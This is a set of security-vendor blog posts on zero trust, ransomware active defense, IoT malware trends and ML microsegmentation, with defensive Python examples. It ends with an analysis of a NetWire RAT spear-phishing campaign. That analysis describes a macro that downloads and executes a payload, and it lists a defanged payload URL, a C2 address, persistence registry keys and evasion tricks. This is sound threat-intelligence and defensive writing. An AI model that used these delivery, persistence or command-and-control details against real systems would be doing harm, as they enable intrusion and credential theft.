Higher demand for end-user support: Supporting apps across multiple devices and platforms can become a full-time endeavor. Often, additional monitoring tools are needed to detect app crashes or performance issues.

Lack of development resources: Developing mobile apps is a competence in and of itself, and quite distinct from the skill sets needed to develop core apps. Enterprise IT is often short of good mobile app design and development talent. Often mobile-app development gets outsourced to vendors, which increases IT spend, adds third-party management responsibilities, and introduces new security issues.

Poor field adoption and ROI: If the mobile-app user experience is bad, user adoption will lag. Mobile-app user workflows must be simple and easy to learn. If mobile applications aren’t used, the effort and resources spent developing them are wasted. And alternative access could compromise enterprise network security by extending the corporate-network threat surface.
A better way

So the key question is not “how do we build better mobile apps?” Instead, IT leads must ask “Are mobile apps worth the effort?” and “Is there a better way to give field staff secure access to core business processes?” The answer to both is “yes.”

Ubiquitous mobile broadband access, increasing cellular speeds over LTE (now moving to 5G), and public Wi-Fi hotspots facilitate remote work from anywhere (customers’ homes, hotels, or coffee shops). Allowing employees to access CBS and PAS applications from the field with the same ease as from HQ or a branch office means there is no need for mobile-app extensions.

However, legacy connectivity models can impede progress. VPNs—intended to secure workers—can introduce lag: more employees contend for limited bandwidth to connect to the corporate data center while data is backhauled via bottlenecked security gateways. Worse, hardware security costs can skyrocket with the need to scale up remote access. The “castle-and-moat” security model isn’t built for the way enterprise business networks are evolving, with thousands of remote workers trying to access applications that are increasingly moving from private data centers into public clouds.

Zero trust architectures are a better way

Inline, cloud-based security services can connect users to applications seamlessly, with all security controls in place and inline. A zero trust architecture typically employs a cloud-security model to support the fundamental principles of a default-deny posture and follow-the-user policy controls. In this way, zero trust extends security protection to mobile devices so that field staff can access core applications with the same level of security controls as HQ-based workers. Gartner says that by 2023, 60% of enterprises will phase out most of their remote access virtual private networks (VPNs) in favor of zero trust architectures.
A zero trust architecture cloud service allows:

Close proximity to users wherever they are: Effective remote access requires a global, cloud-delivered, edge-computing service with points of presence close to all users.

Continually-secured access: Users should never be placed “on the network,” and instead connect only to applications as allowed by configured business policies. (Contrast that with VPN access, which tenuously extends the corporate network beyond the limits of its effective control.)

Authentication based on users and applications: Users and devices are authenticated first, before access to an application is provided (unlike VPN, where users get access to the network first).

Direct access to applications: Users go directly to applications, wherever they reside: in data centers, in the public clouds, etc. Zero trust allows access over the fastest path between the user's location and the application's hosting location without backhauling through the corporate security stack, thereby considerably improving application performance and user experience.

Users access only necessary applications: Authenticating users and granting access to applications based on set policies means that those users only have access to what they need, not the whole network. (This reduces “east/west” exposure: in the old model, if a threat actor breaches a network, the threat actor can move within the perimeter.)

Zero trust services also provide cost avoidance for enterprises:

Less security infrastructure: With zero trust, companies can scale back and reduce spending on the security appliance stack for managing inbound data center traffic from remote users. This includes VPN gateways, load balancers, and DDoS services.

Less spending for mobile app development: Allowing access to core business apps eliminates the need for developing duplicate mobile application equivalents.
It frees up resources or budgets that would be dedicated to creating, rolling out, managing, and maintaining mobile apps.

Secure zero trust access to core business applications eliminates “APPification”

With a zero trust architecture, enterprises with large numbers of remote employees using core business applications can optimize that access with better security and performance. They leverage the power of digital transformation by using the internet to access applications both in data centers and in the cloud, without exposing corporate network information to bad actors looking for breach opportunities.

Zero trust architectures create:

Access that is adaptive and identity-aware
Access to applications anywhere, anytime, by any authorized user
“Virtual perimeters” around user, device and application so that company asset security is assured

Zero trust architectures provide secure connections between remote field employees and the applications they need, removing the need for costly security stacks protecting core business apps, for VPNs, or for any effort to “APPify” crucial business processes.

Thu, 15 Jul 2021 08:00:01 -0700 Sudip Banerjee

Active Defense Strategies for Kaseya-style Ransomware Attacks

The recent Kaseya ransomware incident combined the worst possibilities the infosec community has had to contend with in recent months:

A supply-chain attack
Ransomware
An unpatched application vulnerability (zero day)

This is by no means an isolated incident. Any vulnerability reported in a widely used software product, especially one that does not require authentication to exploit, will likely become a target for spreading ransomware. Attacking the supply chain is simply a cost-effective way to scale ransomware operations. In this blog post, we’ll use the Kaseya incident as a blueprint to recommend a short playbook for what you can do while you await a patch for a software vulnerability you know nothing about.
View our recent webinar for more information on the best defenses against Kaseya supply-chain and similar attacks.

Zero days and active defense

Zero days are a tough nut to crack. The average organization uses hundreds of different types of software and tools. It’s almost impossible to have an accurate software inventory, let alone account for issues like supply-chain attacks and zero days. While the research community plugs away trying to proactively find and hunt bugs to remediate costly zero days in widely used software before adversaries do, Active Defense allows security teams to take a step back and evaluate the problem of zero days as a whole.

Active Defense shifts the focus of security teams away from individual software and esoteric, difficult-to-parse exploitation techniques to proactive defensive strategies while they wait for a patch to be installed. By hypothesizing the objectives that adversaries achieve when exploiting zero days, we can plan our Active Defenses in a manner that can:

Reduce the impact of exploitation
Give an early warning of malicious activity
Gather intelligence on the adversary

Zero days through the kill-chain

The following table shows where zero days are likely to be used in the kill-chain:

Kill-Chain Phase | Possible Zero-Day Targets | Possible Motivation
Initial infection and foothold | Internet-facing software applications and services | Obtain access to a high-value environment
Privilege escalation | Operating system components and locally installed software | Obtain a higher level of privilege to aid the rest of the kill-chain
Lateral movement | Distribution software and internally exposed services | Expand attack footprint in locked-down environments
Action on objectives | Zero days against specialized software | Exploit weaknesses to steal data

Zero days are a means to the end goal, whether in the initial stages of the operation or the critical last step.
From a defensive perspective, this gives us a valuable advantage: if we cannot stop the zero day itself, we have opportunities to trap the adversary either before or after they use it. And you can do just that with Active Defense.

Actively defending against Kaseya-style incidents

The scenario here is that you know about a zero-day target that does not yet have a patch. Let us also assume that the zero day is being used for initial infection and foothold to distribute ransomware within the environment. The following table shows strategies for actively defending against techniques observed in the Kaseya REvil ransomware incident.

Phase | Technique | Active Defense Tactic | Hints, Tips, Tricks
Initial infection | Exploit an internet-facing application | Create public-facing decoys to capture intelligence | Use the application vulnerable to the zero day as a template for the decoy
Execution | Use of PowerShell | Monitor for commands and scripts that involve stopping or disabling services | N/A
Defense evasion | Kill processes and services | Deploy decoy processes and services commonly killed by ransomware | The most commonly attacked processes are those that lock files that are a target for encryption; therefore, “outlook.exe”, MS Office processes, and database processes are usually targeted
Pre-encryption checks | Delete volume shadow copies | Monitor for the deletion of volume shadow copies | Typically, volume shadow copies are deleted using vssadmin.exe or WMI
Encryption | Encrypt files | Deploy decoy files on endpoints to monitor for file modification events | Placing files in common encryption start locations (such as C:\ or %appdata% or Document folders) is a smart way to minimize the impact of encryption

In the case of Kaseya specifically, no worm-like behavior was observed, as the encryptor was pushed to machines via an update.
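The "Encryption" row above (decoy files in common encryption start locations, watched for modification) can be exercised end to end with the following added example; it is not code from the blog post or from any Zscaler product. The decoy names, their contents and the scratch directory tree are constructed for the demo, and on a real endpoint the directories would be the user's Documents folder and %APPDATA% rather than a temp directory.

```python
"""Decoy (canary) files for spotting an encryptor early (added example)."""
import hashlib
import os
import tempfile

# Constructed decoy names: chosen to look like the documents an encryptor goes after first.
DECOY_NAMES = ("Invoice_Q2_2021.docx", "passwords.xlsx", "backup_notes.txt")
DECOY_BODY = b"decoy document - no legitimate process ever edits this file\n" * 16


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def plant_decoys(directories, names=DECOY_NAMES):
    """Write decoys into each directory and return a baseline {path: sha256}.
    On a real endpoint the directories would be the encryption start locations named
    in the table, e.g. os.path.expandvars(r"%APPDATA%") and the Documents folder."""
    baseline = {}
    for directory in directories:
        os.makedirs(directory, exist_ok=True)
        for name in names:
            path = os.path.join(directory, name)
            with open(path, "wb") as fh:
                fh.write(DECOY_BODY)
            baseline[path] = _sha256(path)
    return baseline


def check_decoys(baseline):
    """Compare decoys against the baseline. Returns (path, finding) pairs where finding
    is 'modified' (contents rewritten), 'missing' (deleted or renamed, e.g. a new
    extension appended) or 'unexpected' (a new file appeared next to the decoys,
    the way a ransom note does)."""
    findings = []
    known_dirs = set()
    for path, digest in baseline.items():
        known_dirs.add(os.path.dirname(path))
        if not os.path.exists(path):
            findings.append((path, "missing"))
        elif _sha256(path) != digest:
            findings.append((path, "modified"))
    for directory in sorted(known_dirs):
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if os.path.isfile(path) and path not in baseline:
                findings.append((path, "unexpected"))
    return findings


def run_demo():
    """Plant decoys in a scratch tree, then mimic what an encryptor does to them."""
    root = tempfile.mkdtemp(prefix="decoy-demo-")
    dirs = [os.path.join(root, "Documents"), os.path.join(root, "AppData", "Roaming")]
    baseline = plant_decoys(dirs)
    clean = check_decoys(baseline)
    # 1) a decoy is overwritten in place; 2) a decoy is renamed with a new extension;
    # 3) a note-like file is dropped beside the decoys. All three should surface.
    target = os.path.join(dirs[0], DECOY_NAMES[0])
    with open(target, "wb") as fh:
        fh.write(os.urandom(len(DECOY_BODY)))
    renamed = os.path.join(dirs[1], DECOY_NAMES[1])
    os.replace(renamed, renamed + ".locked")
    with open(os.path.join(dirs[1], "README_TO_RESTORE.txt"), "w") as fh:
        fh.write("constructed note for the demo\n")
    return {"root": root, "clean": clean, "after": check_decoys(baseline)}


if __name__ == "__main__":
    for path, finding in run_demo()["after"]:
        print(finding, path)
```

In production the check would run from a scheduled task or a file-system watcher and raise an alert on the first finding, since a legitimate process never touches these files.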
Beware of distribution points

One of the classic strategies these days, as seen in the Kaseya incident, is to compromise software and update distribution points to deploy ransomware at scale. It is not a stretch to say that any software that installs updatable services on endpoints can be a target of similar attacks, and the table in the previous section is the best form of defense for that. We wish to draw attention to two pervasively present distribution points for ransomware in most organizations:

Active Directory
SCCM

With recent disclosures of serious vulnerabilities—the Print Nightmare vulnerability, for example—both Active Directory and SCCM are at risk of becoming targets for any ransomware that leverages such a vulnerability to spread. Here are four suggestions to actively defend against techniques in such a scenario.

Phase | Technique | Active Defense Tactic
Internal recon (Active Directory) | Query Active Directory for privileged users with rights to create a group policy | Plant decoy users in privileged groups and OUs
Internal recon (Active Directory) | Query Active Directory for SCCM servers | Plant decoy systems with attributes consistent with SCCM servers
Lateral movement via zero days like Print Nightmare | Use the Print Nightmare vulnerability to obtain RCE on Active Directory and SCCM | Disable the print spooler service on AD and SCCM; plant a decoy system on the network with hostname and DNS indicating it is an SCCM server
Lateral movement | Creation of a new group policy or SCCM policy to distribute the encryptor | Monitor and log the creation of new policies

Closing Notes

Organizations should expect that any major vulnerability disclosed is likely to become a target for spreading ransomware. Due to the unpredictability of the TTPs that may be used in individual incidents, we advise organizations to adopt a wider array of Active Defense techniques to build resilience against a variety of ransomware operator strategies.
We also encourage organizations to adopt Active Defense and deception strategies in the following parts of their IT environment:

DMZ (both external and internal segments)
Data center segments hosting business-critical applications, for east-west lateral movement
Active Directory
Privileged endpoints
Endpoints of personnel interacting with sensitive applications

Learn more about the Kaseya supply-chain ransomware attack by viewing our webinar hosted by ThreatLabZ.

Wed, 14 Jul 2021 16:25:53 -0700 Deepen Desai

IoT in the Enterprise Report: Empty Office Edition

It happened overnight for many enterprises. Bustling offices turned into desolate spaces--abandoning plants to die, snacks to go stale, and calendars to remain frozen in time. And like out of a movie, amidst the eerie quiet there was something still alive and buzzing with activity. Neglected in the buildings, set-top boxes, digital signage, networked printers, and many other IoT devices were still connected to the network. As if nothing had changed, the devices continued to refresh data, perform functions, and await commands.

But unlike the other forsaken objects on the shelves, IoT devices drew an inordinate amount of attention. Threat actors quickly identified the devices as attack opportunities, resulting in a staggering 833 IoT malware blocked every hour by the Zscaler cloud.

In our latest research report, IoT in the Enterprise: Empty Office Edition, the Zscaler ThreatLabz threat research team takes a closer look at this activity to answer an important question: What happens when employees abandon their smart devices at work? Using data collected between December 14 and December 31, 2020, when most non-essential business offices were shut down, we completed two studies: an IoT device fingerprinting study that identified IoT devices and traffic, and an IoT malware study based on data from the Zscaler cloud.
The result—an eye-opening deep dive into both sanctioned and unsanctioned IoT devices and IoT malware attacks, showing tremendous growth in both.

Key Findings

IoT malware on corporate networks has increased by 700 percent year-over-year, despite much of the global workforce working from home
Entertainment and home automation devices posed the most risk due to their variety, low percentage of encrypted communication, and connections to suspicious destinations
76% of IoT communications occur on unencrypted plain text channels
Gafgyt and Mirai—malware families popularly used in botnets—accounted for 97 percent of the IoT malware payloads blocked by the Zscaler cloud
Technology, manufacturing, retail & wholesale, and healthcare industries accounted for 98 percent of IoT attack victims
Most attacks originated in China, the United States, and India
Most targets for IoT attacks were in Ireland, the United States, and China

Security Takeaways as Office Life Returns

While some companies are beginning to phase employees back into corporate office spaces, the pandemic lessons about unprotected or improperly protected IoT devices remain unchanged at best. Today, the ever-growing breadth of IoT devices making their way onto corporate networks includes everything from smart watches and IP cameras to automobiles and musical furniture. As we’ve documented in our findings, these new categories of IoT are often completely off the radar for IT teams. At the same time, we’re witnessing these new attack vectors breed ingenuity among threat actors and hasten the need for organizations to employ zero trust policies and architectures. For many, IoT security and policy are still immature. The good news, though, is that now we have the data to understand these dangers, and a set of best practices that organizations of all sizes can implement to improve their IoT security posture.
Download your copy of our latest report and get the full details of today’s IoT threats, including the most common devices, traffic patterns, countries devices route to, most targeted industries, and more, to help you protect your corporate network.

Thu, 15 Jul 2021 05:00:01 -0700 Viral Gandhi

Using Machine Learning to Bridge the Gaps in Microsegmentation

Microsegmentation has become more widely adopted in the cloud and data center because of its enormous promise. Breaking the network into smaller and smaller fragments (often as small as the individual workloads themselves) comes with significant security and performance benefits. According to some estimates, as much as 76% of the traffic in a network is east-west, so allowing only the application communication necessary for business operations can interrupt attack progression.

The problem, though, is that getting to that fully deployed and realized microsegmented environment is challenging. It requires fine-grained knowledge of the application communication patterns and application topologies of the network, with the second step being an inventory of what communication should be allowed and what shouldn’t. This leads to a large number of rules/policies, and large rule sets are difficult for humans to understand, manage and modify. Finally, the rules remain address-centric, which means that the translation from application policies to address-based rules is contained in people’s heads. Gaining the advantages of microsegmentation requires a lot of work, and the work doesn’t stop, since networks continue to change.

Is there some way to complete microsegmentation projects faster and more easily? To make them more accurate, and more resilient in the face of changing business and security challenges? Turns out, there is.

A new approach

We want to make application-centric, rather than address-centric, rules.
Starting with collected data about which applications are communicating, we use machine learning to analyze the data and create a nearly optimal set of automatically generated rules. This moves much of the complexity from humans to computers, which, after all, are much better at sorting through lots of information. The machine learning isn’t used here to find malware; rather, it’s used to establish the state of the network—what is talking to what. We’re developing techniques to identify possibly suspicious activity from applications on a network—for now, the learned rules and our UI allow unexpected applications to be easily identified and dealt with.

Once the rules are created, people can begin to use human insight to protect their network. Because the rules are readable, and expressed explicitly in terms of protecting applications, the rules can be deployed application by application; a human network security expert can use their knowledge and insight to deploy (or edit) the rules in an optimal way. A human is usually better at deciding which applications should be protected first, so we make it easy to find the relevant rules for protecting the most important applications and to use the rules to lock down the application.

Using machine learning

Starting with all the network traffic, we want to create a set of rules with the following goals:

As few rules as possible.
The simplest rules, without superfluous information.
More specific rules, rather than general rules.
Human-readable rules.
Rules with the broadest coverage possible.

These goals are often in conflict with one another. It’s necessary to balance these priorities to get the optimal rules, though. These constraints, and the constraints created by the data, rule out most of the techniques used for machine learning. We ended up doing a stochastic search through a space of candidate rules, maximizing a value based on the above constraints. If this sounds a little hard to understand, it’s not just you.
Let’s try an analogy.

Lost in New York

Imagine you’re standing on a street corner in Manhattan with a latitude-longitude GPS. You know where you want to go, because you have the lat-long coordinates of your destination, but you don’t know which direction to start walking to get there. So you note where you are, walk a few blocks in one particular direction, and look at your GPS again. If you’re closer to your destination than you were, then you stay at your new location and do it again. If you’re further away, you backtrack to where you started and then pick a different distance and direction. Sometimes, even if you’re a bit farther away, you still keep the new location, since maybe it’s a shortcut (or a way to get around Central Park!). As time goes on, you get closer to your destination, until nothing you do makes you any closer. You’ve arrived, more or less.

Of course, Manhattan is two-dimensional, except for the tall buildings. When we’re looking through the space of possible rule sets, there are a lot more “directions” to investigate. That’s why we leave it to the algorithms.

Applying machine learning to microsegmentation: faster to achieve, more secure

There are three ways in which Zscaler machine learning makes policy suggestions, which I’ll describe in more detail below:

1. Observe and describe the network’s intended state.
2. Define optimized policies to enforce that observed/intended state.
3. Continue to learn, adapt, and optimize policies while enforcing that intended state.

Step 1: Observe and describe

In this stage, we want to understand what the network is doing and what it's supposed to look like. Zscaler does this from the point of view of communicating applications, and uses knowledge of application communication patterns to identify anomalous traffic in the future that doesn't fit with previously observed network patterns.
Most people we talk with about our machine learning capabilities are really interested in this stage, since application-centric policies are very different from what they've encountered before. We often have to describe in more detail what we do to accomplish this. Zscaler collects fixed, immutable data about applications: hundreds of attributes that can securely identify applications. Communication patterns between applications, and the hosts and users involved, are also stored. Within 48 hours (often less, depending on the nature of your network and how "locked down" it already is), there’s enough information for Zscaler to begin using machine learning to create policies automatically.

Step 2: Define and enforce

The wealth of information Zscaler collects about the applications and their communication patterns allows it to discover a nearly optimal set of policies that describe what’s been observed, using a relatively small number of features for each policy. Zscaler produces a set of policies that is dramatically smaller than sets constructed using address-based solutions. Plus they're easier to understand, so even managers who aren't application experts can understand how to secure them. For example, one customer previously required more than 13,000 address-based security policies to protect their applications. Zscaler was able to accomplish the same protection with several dozen application-based policies.

That's the real benefit of combining application-based policy creation with machine learning. It becomes much easier to understand security, because the policies are few enough that you can browse them all, and clear enough that you can understand and act upon them. It’s important to note that these policies don't decide what's “good” or “bad” on the network; they only describe what's actually happening on the network, as efficiently and simply as possible.
The goal is to make it as easy as possible for humans to understand what's happening on their network and decide for themselves whether a given suggested policy should be deployed, modified, or eliminated.

Step 3: Learn and optimize

It’s important to note that Zscaler machine learning doesn't stop after the first few days of use. Because application traffic on the network continues, and, more importantly, the network changes and the applications change, there's always more information to gather, and it may be new and different information than what was gathered initially. Hence, Zscaler continues to create new policy sets based on all the collected information. Since new policies could contradict (or confuse) existing policies, already-enforced policies are taken into account while creating new rules. For parts of the network where no policies are in place, however, Zscaler regularly updates its recommended policies to keep up with the evolving network and provides a current confidence score so users have a sense of how accurately the policies reflect current network behavior.

These three stages—observation, creation, and optimization—explain how Zscaler creates policies that provide effective security and can be understood by people. This frees security professionals to do their most important job—protecting the most important applications on their network from attack—without excessive drudgery. That’s how the use of machine learning accelerates the time-to-deploy for a microsegmentation project from weeks or months to days, and allows users to create security policy without needing to write security policy.
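To make the stochastic search and the "Lost in New York" walk concrete, here is an added toy implementation that is not Zscaler's algorithm or code: simulated annealing over candidate rule sets, scored against the five goals listed above (few rules, simple rules, specific rules, coverage of every observed flow, readability). The flow log, the rule shape (source app, destination app, port) and the penalty weights are all constructed for the demonstration.

```python
"""Stochastic search for a compact application-centric rule set (added example)."""
import math
import random

WILD = "*"

# Constructed flow log: (source app, destination app, port) tuples observed on the network.
OBSERVED = [
    ("web-frontend", "order-api", "8443"),
    ("web-frontend", "catalog-api", "8443"),
    ("mobile-gateway", "order-api", "8443"),
    ("mobile-gateway", "catalog-api", "8443"),
    ("order-api", "orders-db", "5432"),
    ("catalog-api", "catalog-db", "5432"),
    ("order-api", "cache", "6379"),
    ("catalog-api", "cache", "6379"),
    ("metrics-agent", "order-api", "9100"),
    ("metrics-agent", "catalog-api", "9100"),
    ("metrics-agent", "orders-db", "9100"),
    ("metrics-agent", "catalog-db", "9100"),
    ("metrics-agent", "cache", "9100"),
]


def matches(rule, flow):
    return all(r == WILD or r == f for r, f in zip(rule, flow))


def covers_all(rules, flows):
    return all(any(matches(r, f) for r in rules) for f in flows)


def candidate_space(flows):
    """Every (src, dst, port) combination of values seen in the flows; the
    ones never observed are what an over-general rule would wrongly permit."""
    srcs, dsts, ports = ({f[i] for f in flows} for i in range(3))
    return [(s, d, p) for s in srcs for d in dsts for p in ports]


def score(rules, flows, candidates):
    """Higher is better. Penalises rule count (fewer rules), wildcards (simpler,
    more readable rules) and overreach (unobserved traffic the rules would allow,
    i.e. specific beats general). Coverage of observed flows is enforced by the search."""
    observed = set(flows)
    overreach = sum(1 for c in candidates
                    if c not in observed and any(matches(r, c) for r in rules))
    wildcards = sum(r.count(WILD) for r in rules)
    return -(1.0 * len(rules) + 0.3 * wildcards + 0.5 * overreach)


def mutate(rules, flows, rng):
    """One random step: widen a field to '*', drop a rule, or narrow a '*' back down."""
    rules = list(rules)
    i = rng.randrange(len(rules))
    rule = list(rules[i])
    roll = rng.random()
    if roll < 0.45:
        rule[rng.randrange(3)] = WILD
        rules[i] = tuple(rule)
    elif roll < 0.8 and len(rules) > 1:
        rules.pop(i)
    else:
        wild = [j for j in range(3) if rule[j] == WILD]
        matched = [f for f in flows if matches(rules[i], f)]
        if wild and matched:
            j = rng.choice(wild)
            rule[j] = rng.choice(matched)[j]
            rules[i] = tuple(rule)
    return list(dict.fromkeys(rules))  # drop duplicate rules


def search(flows, iterations=4000, seed=7, start_temp=1.0):
    """Simulated annealing over rule sets: start from one exact rule per flow and keep
    taking random steps, accepting every improvement and, early on, some worse moves
    (the "shortcut around Central Park"). The best set seen is returned."""
    rng = random.Random(seed)
    candidates = candidate_space(flows)
    current = list(dict.fromkeys(flows))
    cur_score = score(current, flows, candidates)
    best, best_score = current, cur_score
    for i in range(iterations):
        proposal = mutate(current, flows, rng)
        if not covers_all(proposal, flows):
            continue  # a rule set that no longer describes every observed flow is rejected
        s = score(proposal, flows, candidates)
        temp = start_temp * (1.0 - i / iterations) + 1e-9
        if s >= cur_score or rng.random() < math.exp((s - cur_score) / temp):
            current, cur_score = proposal, s
            if s > best_score:
                best, best_score = proposal, s
    return sorted(best), best_score


if __name__ == "__main__":
    rules, value = search(OBSERVED)
    print("score %.1f -> %d rules for %d flows" % (value, len(rules), len(OBSERVED)))
    for rule in rules:
        print("  allow %s -> %s : %s" % rule)
```

With these weights the search collapses the five monitoring flows into one readable rule while keeping the database and cache rules specific, because a wildcard there would permit source/destination pairs that were never observed.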
Read more:

Blog: How Microsegmentation Differs from Network Segmentation
On-Demand Webinar: Microsegmentation Made Easy with Identity and Automation
Blog: Microsegmentation 101

Wed, 14 Jul 2021 09:15:20 -0700 John O'Neil

Targeted Attack on Government Organizations Delivers Netwire RAT

The Zscaler ThreatLabz team has observed an interesting spear phishing campaign, beginning in July 2021, in which a threat actor is targeting a wide range of organizations in Pakistan. NetwiredRC is being used as the final payload in this attack campaign. The combination of spear phishing and the use of an information-stealing RAT indicates that this is not simple cybercrime, but a larger cyberattack campaign targeting multiple government organizations in Pakistan along with other industry verticals.

Attack Cycle

Figure 1: Attack chain

Key features of this attack

The attack has targeted multiple Pakistani government organizations using spear phishing emails.
Lures use email info stolen from the actual website of the Pakistan government (Ministry of Information Technology and Telecommunication).
The attack downloads its payload from the compromised website of the National College of Nepal located in Kathmandu.
NetwireRAT, a well-known malware for stealing sensitive information, is being used as the final payload in the attack.
Stolen information is sent through a proxy server in obfuscated form, using the API WinHttpGetIEProxyConfigForCurrentUser(), to the command and control server 66[.]42.43.177:443.

One of the latest spearphishing emails was sent from a spoofed email ID <> masquerading as “National Cyber Security Policy Feedback,” impersonating a government account which may be known to the target. During analysis, we found that the originating IP of the email is 209[.]58.188.82, which belongs to Hong Kong and has been reported for multiple phishing attacks in the past.
Figure 2: Spoofed email from <>

The email was sent on Wednesday, June 30, 2021 10:44 AM (PKT) with the subject “Cyber Security Policy Consultation Draft Final Update” to lure the recipients into opening an attached file named “NSCP-DRAFT-Final.docm”. The mail body contained information on the latest updates of the National Cyber Security Policy Draft along with the signature of a senior official to make the email look more professional and genuine. Upon further research, it seems that the email info has been copied from the Ministry of Information Technology & Telecommunication site.

Figure 3: Email info from MoITT site.

Digging into the message source of the email, we can see that the spearphishing email is targeting users from a number of different industry verticals.

Figure 4: Originating IP and recipient email IDs from message source

Looking at the email IDs of multiple users, we can see that multiple sectors are being targeted by the threat actor, including the Energy, Agricultural, Chemicals, Educational, Telecommunication and Financial sectors, among others.

Distribution Strategy

We have observed multiple documents being delivered in various spearphishing attacks. All the documents have exactly the same macro content with the same URL to download the final payload.

1.) The first document we analyzed has macro code containing a PowerShell script to download the final payload and execute it.

MD5 Hash: 22DF783F7881A7F6973028E21CA19D4F
File Name: NSCP-DRAFT-Final.docm

Figure 5: Attached .docm file prompts the user to enable macros

2.) The second document we analyzed has a different title and slightly different text, but is otherwise extremely similar to the first document, and also has macro code containing a PowerShell script to download the final payload and execute it.

MD5 Hash: AB5DAC030DC5FC9ED802C0322168558B
File Name: SCO-Cyber-Advisory.docm

Figure 6: Another malicious .docm file

3.)
The third document we analyzed is also very similar to the first two instances. It contains macro code with a PowerShell script to download the final payload and execute it. The content displayed in this document masquerades as a lab handbook related to the Institute of Space Technology (IST), Islamabad.

MD5 Hash: B6EC09770ED5B34922B0CF56CB17BC95
File Name: Press Note July-SCO.docm

Figure 7: Another similar .docm with a malicious macro

Technical Analysis of the macro

Once the document is opened, the attackers try to trick the user by prompting them to enable macros to read the complete document. Once the user enables the macro, an AutoOpen() subroutine is called, which then executes a malicious Visual Basic for Applications (VBA) macro with a base64-encoded URL. The macro downloads the final payload and, with the help of a PowerShell command, saves it to a path and executes it from there.

Figure 8: Macro code with base64-encoded URL

The two functions performed by the macro code are:

a.) Download the payload from the URL given in the macro code.
b.) Save and execute the payload from the path specified in the macro code.

Upon decoding, we get the URL, which seems to be a recently compromised website belonging to the National College of Nepal located in Kathmandu.

“hxxps://[.]np/admin/assets/js/jquery/tiny/plugins/anchor/.anchor/sysWow64.exe”

Figure 9: Decoded macro code

File Path: <C:\Windows\System32\spool\drivers\color\sysWow64.exe>

Technical Analysis of the payload

Once PowerShell downloads the final payload (NetwiredRC), it copies itself to the above-mentioned path, from where it gets executed. NetwireRAT is not a new malware/RAT on the surface. First seen in 2012, it attempts to steal victims' passwords, including login credentials, FTP credentials, credit card data, etc. It claims to be available for all OS platforms including macOS, Android and Windows. NetWireRAT is believed to have been used by the Iranian nation-state sponsored group APT33/Elfin back in 2016.
Once executed on the victim's machine, several anti-analysis techniques are used to protect the malware from analysis. This version of NetWire has recently been equipped with new anti-analysis techniques in order to hinder reverse engineering. Earlier versions used Windows APIs for anti-analysis tricks, such as GetCursorPos() to check the mouse position and ZwGetContextThread() to check register state for breakpoints. The screenshot below shows the use of the GetCursorPos() API as an anti-analysis trick in an older version.

Figure 10: Anti-analysis technique used in an older version of NetWire

In addition, the old NetWire malware also checked register state for software breakpoints, as we can see in the image above. For example, the call eax instruction is the call to the API. If we put a breakpoint on it in the debugger, the byte is replaced with 0xCC. NetWire checks for that value using the ZwGetContextThread() API as an anti-analysis trick.

MD5 Hash: 60D234D54C25DCEF19A64DED3A587072

During our analysis, we found that the malware extracts malicious code into memory and executes it there to evade antivirus detection. During static analysis, we found that the malware imports some notable libraries, such as WS2_32, to perform network activity.

Figure 11: Import libraries of the malware

Debugging the malicious code, we saw that the malware author has also employed string obfuscation as an anti-analysis trick, as shown in Figure 12.

Figure 12: Obfuscated string

Following decryption, we get the following API name: "WinHttpGetIEProxyConfigForCurrentUser"

This piece of code has a self-decryption routine: it allocates new memory space and then decrypts the code into it.

Figure 13: Self-decryption routine

Persistence

After decryption, the malware generates a random HostId and stores it as a registry value.
Figure 14: Random HostID

Key: HKEY_CURRENT_USER\Software\NETwIRe, Name: HostId
Key: HKEY_CURRENT_USER\Software\NETwIRe, Name: Install Date
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, Name: sysWOW32

Figure 15: Registry key for persistence.

Stealing functionality

This malware steals sensitive information from the victim's machine.

Figure 16: Stealing information

Keystrokes are logged to a file created in the %AppData% directory, which the malware stores in obfuscated form.

Figure 17: Keylogs in obfuscated form

Command and Control

Another thing we observed in the new variant's network activity is that it uses the WinHttpGetIEProxyConfigForCurrentUser() API, which retrieves the Internet Explorer proxy configuration for the current user on the system (adversaries use this feature as a network relay between the malware and the proxy server by listening on a certain port). This API retrieves the list of proxy servers configured on the system. The malware steals users' sensitive information and the history stored in their browsers and sends it to the command and control server. During our analysis of the binary structure, we found the hardcoded IP address of the command and control server: 66[.]42.43.177.

Figure 18: Data to be sent using proxy

ThreatLabz observed that the NetwireRAT malware sends the collected victim data through the proxy server in obfuscated form using the same API (decrypted above). Sending victim data through a proxy server is a new feature implemented in the updated version of NetWireRAT.

Config extracted from malware

{
    "C2 list": [
        "",
        ""
    ],
    "Password": "Password",
    "Host ID": "HostId-%Rand%",
    "Mutex": "-",
    "Install Path": "C:\\Windows\\System32\\spool\\drivers\\color",
    "Startup Name": "sysWOW32",
    "ActiveX Key": "-",
    "KeyLog Directory": "-"
}

Cloud Sandbox Detection

Zscaler Cloud Sandbox successfully detects the malicious documents as well as the payload.
Figure 19: Zscaler Cloud Sandbox detection

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators at various levels:
VBA.Downloader.NetwiredRC
Win32.Backdoor.NetwiredRC

Conclusion

Over the years, cyber criminals have adopted multiple ways to infect their victims with NetwiredRC and have had a lot of success. We are not conclusively attributing this attack to any particular group with high confidence, but similar techniques and NetwireRAT payloads have been utilized by state-sponsored groups such as APT33 and Gorgon. Attackers continuously embrace new anti-analysis tricks to evade security solutions; re-packaging of malware makes static analysis even more challenging. The Zscaler ThreatLabz team will continue to monitor this attack, as well as others, to help keep our customers safe.

MITRE ATT&CK TTP Mapping

Technique ID  Technique
T1547         Boot or Logon Autostart Execution
T1056         Input Capture
T1036         Masquerading
T1113         Screen Capture
T1082         System Information Discovery
T1055         Process Hollowing
T1555         Credentials from Web Browsers
T1074         Data Staged: Local Data Staging

Indicators of Compromise (IOCs)

Doc files
22DF783F7881A7F6973028E21CA19D4F
AB5DAC030DC5FC9ED802C0322168558B
B6EC09770ED5B34922B0CF56CB17BC95

Payload
60D234D54C25DCEF19A64DED3A587072
715788FB520B3873DB406FDF59521AFA
026C1CE7E96A898C23A7CE9A567B9568
617E8CC54BB247091266826225553A25

CnC
66[.]42.43.177:443

Wed, 14 Jul 2021 21:42:27 -0700 Avinash Kumar

IT Security in the Pharmaceutical Industry

